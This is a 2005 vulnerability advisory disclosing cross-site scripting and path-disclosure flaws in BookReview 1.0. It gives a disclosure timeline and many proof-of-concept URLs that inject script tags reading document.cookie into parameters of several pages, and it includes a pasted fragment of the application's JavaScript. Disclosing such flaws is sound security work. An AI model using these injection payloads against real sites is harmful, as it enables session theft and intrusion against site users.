###################################################
BookReview 1.0 multiple variable XSS
vendor url:http://www.readersunite.com
advisore:http://lostmon.blogspot.com/2005/05/
bookreview-10-multiple-variable-xss.html
vendor notify: yes exploit available: yes
###################################################

BookReview contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the 
application does not validate multiple variables upon
submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute 
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.



############
versions:
############

BookReview beta 1.0 vulnerable.


##############
solution
##############

no solutions was available at this time


###########
timeline
###########

discovered: 27 april 2005
vendor notify 17 may 2005 (webform)
disclosure: 26 may 2005



##################
proof of concepts
###################
all files are submitted to 'index.php' script by variable 'page' like 
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]
the name of module can be 'add_review' 'add_contents' or others

for example this url:
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25

is the same of this :

http://[victim]/add_contents&isbn=083081423X&chapters=25

with this if you think we have two ways for exploiting this situation
, one with the index.php and other directly by the module.

##################
add_review.htm
#################

http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true

http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true

http://[victim]/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true

http://[victim]/add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)</script>

###################
index.php
###################

http://[victim]/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25

http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

NICE ERROR !!


; function tallyup() { var count = 0; var book = 0; var part = 0; var
section = 0; var chapter = 0; var appendix = 0; var main_prefix = "";
var section_prefix = ""; for ( i=0; i var persian = '' + value; var
roman=""; var ronumdashes=""; var buffer=10-persian.length; while
(buffer>0) {persian="0"+persian;buffer--} var units=new
Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new
Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var
hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM");
var thousands=new
Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var
billionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes=billionsdashes[persian.substring(0,1)]; var
hundredmillionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var
tenmillionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes+=tenmillionsdashes[persian.substring(2,3)]; var
millionsdashes=new
Array("","_","__","___","_=","=","=_","=__","=___","_=");
romandashes+=millionsdashes[persian.substring(3,4)]; var
hundredthousandsdashes=new
Array("","_","__","___","__","_","__","___","____","__");
romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var
tenthousandsdashes=new
Array("","_","__","___","__","_","__","___","____","__");
romandashes+=tenthousandsdashes[persian.substring(5,6)]; var
thousandsdashes=new Array("","","",""," _","_","_","_","_"," _");
romandashes+=thousandsdashes[persian.substring(6,7)];
roman=thousands[persian.substring(0,1)];
roman+=hundreds[persian.substring(1,2)];
roman+=tens[persian.substring(2,3)];
roman+=thousands[persian.substring(3,4)];
roman+=hundreds[persian.substring(4,5)];
roman+=tens[persian.substring(5,6)];
roman+=thousands[persian.substring(6,7)];
roman+=hundreds[persian.substring(7,8)];
roman+=tens[persian.substring(8,9)];
roman+=units[persian.substring(9,10)]; return roman; } function
alphabetise(number) { return String.fromCharCode(64+number); } ///
function submitconfirm() { var agree =
document.getElementById('agree'); if ( !agree.checked ) { alert("You
must indicate your agreement to the terms and conditions by checking
the box provided."); return false; } return true; }


###################
add_contents.htm
###################


http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#########################
others.
#########################

http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author

http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels

http://[victim]/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT>

############################
posible local fle inclusion
############################

http://[victim]/suggestions/"><script>alert(document.cookie)</script>.htm
http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm

http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author



################
path disclosure:
################

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=auth
or

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title


######################## €nd ########################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente